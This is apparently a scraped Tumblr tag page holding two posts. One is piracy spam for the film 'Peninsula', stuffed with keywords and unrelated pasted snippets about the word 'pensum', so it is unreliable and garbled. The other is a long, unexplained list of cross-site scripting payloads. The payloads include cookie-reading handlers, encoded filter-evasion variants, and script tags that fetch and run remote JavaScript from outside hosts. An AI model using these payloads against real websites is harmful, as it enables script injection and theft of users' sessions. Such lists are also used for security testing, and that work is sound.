#114; =)
Explore tagged Tumblr posts
Text
uTorrent Peninsula 2020 Pelicula Completa latino HD 1080p
uTorrent Peninsula 2020 Pelicula Completa latino HD 1080p
Ver~ Peninsula Pelicula Completa Latino ☆HD☆2020,Ver~ Peninsula Pelicula Completa en Español Latino 2020,Ver~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Ver~ Peninsula 2020 Pelicula Completa latino HD 1080p,

"
A soldier and his team battle hordes of post-apocalyptic zombies in the wastelands of the Korean Peninsula bioskopin21.xyz.
Peninsula 2020
Fechas de estreno: 2020-07-15 Género: Action, Horror, Thriller Duración: 114 Minutes Company : Next Entertainment World, RedPeter Film Reparto: Kang Dong-won, Lee Jung-hyun, Lee Re, Kwon Hae-hyo, Kim Min-jae, Koo Kyo-hwan, Kim Do-yoon, Lee Ye-won, Kim Gyu-baek, Jang So-yeon
HD Descargar ►► haga clic aquí
REVISIÓN:
¿Qué es Pensum » Su Definición y Significado 2020 ~ El pensum es el plan de estudio de una carrera que da a conocer las materias o asignaturas que se estudiarán en cada período de la misma Éste está meticulosamente preparado por los docentes o profesionales del curso con la finalidad de que el estudiante perciba todos los conocimientos necesarios para iniciar su vida profesional una vez culminada su vida estudiantil
pénsum Definición Diccionario de la lengua española ~ Del lat pensum tarea obligación cf ingl pensum y fr pensum tarea escolar 1
pensun o pénsum Fundéu ~ Se trata de una forma de referirse al ‘plan de estudios’ En español debe tildarse pénsum y formar el plural como pensa caso excepcional recogido en la Gramática académica Con respecto al origen procede del latín pensum participio del verbo pendere Este verbo tiene numerosas acepciones y entre ellas está ‘examinar evaluar’
Pensum Definition of Pensum by MerriamWebster ~ History and Etymology for pensum New Latin from Latin duty charge something weighed out from neuter of pensus past participle of pendere to weigh estimate pay Learn More about pensum Dictionary Entries near pensum
Home Pontificia Universidad Javeriana ~ Perfil del egresado El profesional egresado de la carrera de Arquitectura de la Pontificia Universidad Javeriana está formado para liderar la transformación y organización del espacio físico adecuándolo a las necesidades humanas gerenciar los procesos a lo largo de su ejecución y brindar al país soluciones integrales acordes con sus características socioculturales y ambientales para
Pensum Escuela Dominical Nacional Ipuc escueladominicals ~ Pensum Escuela Dominical Nacional Ipuc Aviso legal Política de privacidad Política de cookies Mapa del sitio Inicia sesión Salir Editar Jimdo Esta página web ha sido creada con Jimdo ¡Regístrate ahora gratis en om
Pensum Universidad Autónoma de Santo Domingo ~ Ofertas Academicas Detalles Categoría Información General La Universidad Autónoma de Santo Domingo es una institución que une a profesoresas estudiantes y trabajadores administrativos de apoyo a la labor académica con el propósito de dar cumplimiento a la misión universitaria orientada hacia la búsqueda de la verdad la proyección del porvenir de la sociedad dominicana y el
Pensum Universidad Autónoma de Santo Domingo ~ Pensum Ingeniería Lacteoalimentaria Sobre la Carrera Pensum Tecnología en procesos lácteos alimentarios Pensum Sobre la Carrera Docentes Personal Administrativo Horarios y Contactos Centro de Adiestramiento Lechero CAL Veterinaria Sobre la Escuela Carreras Lic en Medicina Veterinaria Sobre la Carrera Pensum
Programas académicos – ITM ~ Campus Robledo Calle 73 No 76A 354 Vía al Volador Tel 574 440 51 00 Fax 574 440 51 02 Campus Fraternidad Calle 54A No 30 01 Barrio Boston
Universidad Dominicana OM ~ Tels 809 5337733 809 5332648 Fax 809 5350048 Email email protected Universidad Dominicana OM Ave Independencia 200 Rep Dom Ir a Contacto
Streaming en línea Peninsula (2020) búsqueda relacionada
Peninsula 2020 Pelicula Completa Online, Descargar Peninsula 2020 Pelicula Completa Torrent, Ver HD Peninsula 2020, Descargar Peninsula Pelicula Completa en Espanol Latino, Peninsula Pelicula Completa en Linea Subtitulado, Peninsula Pelicula Completa Espanol, Watch Peninsula (2020) Online Free, Download Peninsula (2020) Soundtrack, Watch Peninsula (2020) Online Dailymotion, Download Peninsula (2020) Subtitle, Watch Peninsula (2020) Online Best Quality, Watch Peninsula (2020) Free Good Quality,Ver~ Peninsula 【2020】 Pelicula Online HD En Español,Ver~ Peninsula - 2020 En Español Latino HD 1080p},Ver~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Cuevana~HD Peninsula Pelicula Completa Latino ☆HD☆2020,Cuevana~HD Peninsula Pelicula Completa en Español Latino 2020,Cuevana~HD Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Cuevana~HD Peninsula 2020 Pelicula Completa latino HD 1080p,Cuevana~HD Peninsula 【2020】 Pelicula Online HD En Español,Cuevana~HD Peninsula - 2020 En Español Latino HD 1080p},Cuevana~HD Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Descargar Peninsula Pelicula Completa Latino ☆HD☆2020,Descargar Peninsula Pelicula Completa en Español Latino 2020,Descargar Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Descargar Peninsula 2020 Pelicula Completa latino HD 1080p,Descargar Peninsula 【2020】 Pelicula Online HD En Español,Descargar Peninsula - 2020 En Español Latino HD 1080p},Descargar Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Ver (online) Peninsula Pelicula Completa Latino ☆HD☆2020,Ver (online) Peninsula Pelicula Completa en Español Latino 2020,Ver (online) Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Ver (online) Peninsula 2020 Pelicula Completa latino HD 1080p,Ver (online) Peninsula 【2020】 Pelicula Online HD En Español,Ver (online) Peninsula - 2020 En Español Latino HD 1080p},Ver (online) Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Mega~HD Peninsula Pelicula Completa Latino ☆HD☆2020,Mega~HD Peninsula Pelicula Completa en Español Latino 2020,Mega~HD Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Mega~HD Peninsula 2020 Pelicula Completa latino HD 1080p,Mega~HD Peninsula 【2020】 Pelicula Online HD En Español,Mega~HD Peninsula - 2020 En Español Latino HD 1080p},Mega~HD Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,MegaTorrent Peninsula Pelicula Completa Latino ☆HD☆2020,MegaTorrent Peninsula Pelicula Completa en Español Latino 2020,MegaTorrent Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,MegaTorrent Peninsula 2020 Pelicula Completa latino HD 1080p,MegaTorrent Peninsula 【2020】 Pelicula Online HD En Español,MegaTorrent Peninsula - 2020 En Español Latino HD 1080p},MegaTorrent Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,uTorrent Peninsula Pelicula Completa Latino ☆HD☆2020,uTorrent Peninsula Pelicula Completa en Español Latino 2020,uTorrent Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,uTorrent Peninsula 2020 Pelicula Completa latino HD 1080p,uTorrent Peninsula 【2020】 Pelicula Online HD En Español,uTorrent Peninsula - 2020 En Español Latino HD 1080p},uTorrent Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,[ VER]] Peninsula Pelicula Completa Latino ☆HD☆2020,[ VER]] Peninsula Pelicula Completa en Español Latino 2020,[ VER]] Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,[ VER]] Peninsula 2020 Pelicula Completa latino HD 1080p,[ VER]] Peninsula 【2020】 Pelicula Online HD En Español,[ VER]] Peninsula - 2020 En Español Latino HD 1080p},[ VER]] Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,PelisPLUS~ Peninsula Pelicula Completa Latino ☆HD☆2020,PelisPLUS~ Peninsula Pelicula Completa en Español Latino 2020,PelisPLUS~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,PelisPLUS~ Peninsula 2020 Pelicula Completa latino HD 1080p,PelisPLUS~ Peninsula 【2020】 Pelicula Online HD En Español,PelisPLUS~ Peninsula - 2020 En Español Latino HD 1080p},PelisPLUS~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Mirapelis~ Peninsula Pelicula Completa Latino ☆HD☆2020,Mirapelis~ Peninsula Pelicula Completa en Español Latino 2020,Mirapelis~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Mirapelis~ Peninsula 2020 Pelicula Completa latino HD 1080p,Mirapelis~ Peninsula 【2020】 Pelicula Online HD En Español,Mirapelis~ Peninsula - 2020 En Español Latino HD 1080p},Mirapelis~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado, Peninsula Pelicula Completa Latino ☆HD☆2020, Peninsula Pelicula Completa en Español Latino 2020, Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆, Peninsula 2020 Pelicula Completa latino HD 1080p, Peninsula 【2020】 Pelicula Online HD En Español, Peninsula - 2020 En Español Latino HD 1080p}, Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado, Watch Peninsula (2020) Online Free Yesmovies, Watch Peninsula (2020) Reddit 123movies, Watch Peninsula (2020) Blu Ray Online Free, Download Peninsula (2020) Leaked Full Movie, Download Peninsula (2020) English Version, Watch Peninsula (2020) Good Quality, Watch Peninsula (2020) Download Free, Watch Peninsula (2020)
1 note
·
View note
Text
\x27\x3e\x3cimg\x20src\x3dx\x20onerror\x3d\x27alert(\x2fXSS\x2f)\x27 home'-alert(document.cookie)-'a javascript:onload('javascript:alert(1)') aaa<%tag onmouseover="($)'a').html('<'%2b'h1>xss'))">hover here aaa<%tag style=xss:expression(alert('XSS'))> <meta http-equiv="refresh" content='0; url="http://www.ey.com"> =https%3A%2F%2Fmalicous2.com"'/><meta http-equiv="refresh" content='0; url="http://www.ey.com"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"<XSS>=&{()} 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" <script/src=data:,alert()> <marquee/onstart=alert()> <video/poster/onerror=alert()> <isindex/autofocus/onfocus=alert()> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <a onmouseover="alert(document.cookie)">xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <IMG SRC=javascript:alert( 'XSS')> <IMG SRC=javascript:a& #0000108ert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC="  javascript:alert('XSS');"> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert('XSS');// </script><script>alert('XSS');</script> </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert('XSS')> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <XSS STYLE="xss:expression(alert('XSS'))"> <XSS STYLE="behavior: url(xss.htc);"> ºscriptæalert(¢XSS¢)º/scriptæ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" veris-->group<svg/onload=alert(/XSS/)// #"><img src=M onerror=alert('XSS');> element[attribute='<img src=x onerror=alert('XSS');> [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] %22;alert%28%27RVRSH3LL_XSS%29// javascript:alert%281%29; <w contenteditable id=x onfocus=alert()> alert;pg("XSS") <svg/onload=%26%23097lert%26lpar;1337)> <script>for((i)in(self))eval(i)(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> <sCR<script>iPt>alert(1)</SCr</script>IPt> <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"> <img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg"> <svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d %0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON" action="alert('XSS')"/> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <iframe src="	javascript:prompt(1)	"> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=``
 onerror=alert(1)
 <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/ "><h1/onmouseover='\u0061lert(1)'> <iframe/src="data:text/html,<svg onload=alert(1)>"> <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> <svg><script xlink:href=data:,window.open('https://www.google.com/') </script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> <iframe src=javascript:alert(document.location)> <form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> <img/  src=`~` onerror=prompt(1)> <form><iframe  src="javascript:alert(1)" ;> <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a http://www.google<script .com>alert(document.location)</script <a href=[�]"� onmouseover=prompt(1)//">XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( �</form><input type="date" onfocus="alert(1)"> <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt(1)>'> <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=<!-- >alert(1)> <///style///><span %2F onmousemove='alert(1)'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert(1)'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe// src=javaSCRIPT:alert(1) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> <a/href="javascript: javascript:prompt(1)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(1) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} <a href="javascript:\u0061le%72t(1)"><button> <div onmouseover='alert(1)'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT:alert(1)">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var> <a href=javascript:alert(document.cookie)>Click Here</a> <img src="/" =_=" title="onerror='prompt(1)'"> <%<!--'%><script>alert(1);</script --> <script src="data:text/javascript,alert(1)"></script> <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<><iframe/src=javascript:confirm(1) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div> http://www.<script>alert(1)</script .com <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> <svg><script ?>alert(1) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <img src=`xx:xx`onerror=alert(1)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript:alert(1)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1 <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script <object data=javascript:\u0061le%72t(1)> <script>+-+-1-+-+alert(1)</script> <body/onload=<!-->
alert(1)> <script itworksinallbrowsers>/*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) <svg><script>//
